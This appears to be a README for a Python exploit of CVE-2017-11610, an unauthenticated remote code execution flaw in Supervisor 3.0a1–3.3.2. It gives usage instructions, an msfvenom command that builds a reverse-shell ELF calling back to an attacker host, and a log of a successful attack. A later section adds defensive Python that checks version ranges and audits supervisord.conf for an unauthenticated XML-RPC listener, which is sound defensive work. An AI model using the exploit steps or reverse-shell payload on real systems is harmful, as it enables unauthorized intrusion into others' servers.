Standalone Python ≥3.6 RCE Unauthenticated exploit for Supervisor 3.0a1 to 3.3.2

CVE-2017-11610 Unauthenticated Reverse Shell RCE for Supervisor 3.0a1 - 3.3.2

Standalone Python ≥3.6 Unauthenticated RCE exploit for Supervisor 3.0a1 to 3.3.2, rewritten from this Metasploit module. Explanatory post here.

Tested with Python 3.7 on this target running Supervisor 3.3.2

Usage:

root@Kali:~/Infosec/RubyStuff/Supervisor-3.3.2# ./exploit.py -h
usage: exploit.py [-h] -rhost RHOST [-rport RPORT] -payload PAYLOAD
                  [-rpcpath RPCPATH]

Generate the payload first, eg: 
msfvenom -a x64 --platform Linux -p linux/x64/shell_reverse_tcp LHOST=192.168.92.134 LPORT=4445 -f elf -o dir/payload.elf

Required arguments:
  -rhost RHOST      Target host running Supervisor eg. 192.168.92.153
  -payload PAYLOAD  Path to the ELF payload. eg dir/payload.elf

Optional arguments:
  -rport RPORT      Target port running Supervisor. Default: 9001
  -rpcpath RPCPATH  Path to the XML-RPC endpoint on Supervisor. Default: '/RPC2' as in http://192.168.92.153:9001/RPC2

Call the exploit like this: 
 ./exploit.py -rhost 192.168.92.153 -rport 9001 -rpcpath /RPC2 -payload dir/payload.elf

root@Kali:~/Infosec/RubyStuff/Supervisor-3.3.2# msfvenom -a x64 --platform Linux -p linux/x64/shell_reverse_tcp LHOST=192.168.92.134 LPORT=4445 -f elf -o payload.elf
No encoder or badchars specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: payload.elf
root@Kali:~/Infosec/RubyStuff/Supervisor-3.3.2# ./exploit.py -rhost 192.168.92.153 -payload payload.elf
Extracting version from web interface..
Vulnerable version found: 3.3.2
Sending XML-RPC payload via POST to 192.168.92.153:9001/RPC2
Successful remote code execution
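A defender-side companion to the two facts the session above turns on (the Supervisor version and an XML-RPC endpoint reachable without credentials): an added example that is not part of this repository, which classifies a reported version against the affected range named above (3.0a1 through 3.3.2) and audits a supervisord.conf for an exposed, credential-less [inet_http_server]. The sample configs are constructed for the demonstration.

```python
import configparser
import re

# Pre-release tags sort before the final release: 3.0a1 < 3.0b1 < 3.0rc1 < 3.0
_PRE = {"a": 0, "b": 1, "rc": 2}
_FINAL = (3, 0)  # sorts after every pre-release tag
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:(a|b|rc)(\d+))?$")


def parse_version(text):
    """Turn '3.3.2' or '3.0a1' into a tuple that compares in release order."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Supervisor version string: {text!r}")
    major, minor, patch, tag, num = m.groups()
    pre = (_PRE[tag], int(num)) if tag else _FINAL
    return (int(major), int(minor), int(patch or 0), *pre)


AFFECTED_LOW, AFFECTED_HIGH = parse_version("3.0a1"), parse_version("3.3.2")


def is_affected_version(text):
    """True when the version lies in the range the README names.
    Caveat (assumption to verify per host): a distribution package may
    ship a backported fix without changing this string."""
    return AFFECTED_LOW <= parse_version(text) <= AFFECTED_HIGH


def audit_inet_http_server(conf_text):
    """Return findings for the [inet_http_server] section of a supervisord.conf."""
    cp = configparser.ConfigParser()
    cp.read_string(conf_text)
    if not cp.has_section("inet_http_server"):
        return []  # XML-RPC is not reachable over TCP at all
    sec = cp["inet_http_server"]
    findings = []
    # Supervisor accepts 'host:port', '*:port' or a bare port; the latter two
    # bind every interface.
    port = sec.get("port", "")
    host = port.rsplit(":", 1)[0] if ":" in port else "*"
    if host not in ("127.0.0.1", "localhost"):
        findings.append(f"XML-RPC listens on non-loopback address {host!r}")
    if not (sec.get("username") and sec.get("password")):
        findings.append("no username/password set: XML-RPC is unauthenticated")
    return findings


# Constructed sample configs: the exposed setting beside the corrected one.
WEAK_CONF = "[inet_http_server]\nport = *:9001\n"
HARDENED_CONF = ("[inet_http_server]\nport = 127.0.0.1:9001\n"
                 "username = admin\npassword = {SHA}placeholder-hash\n")
```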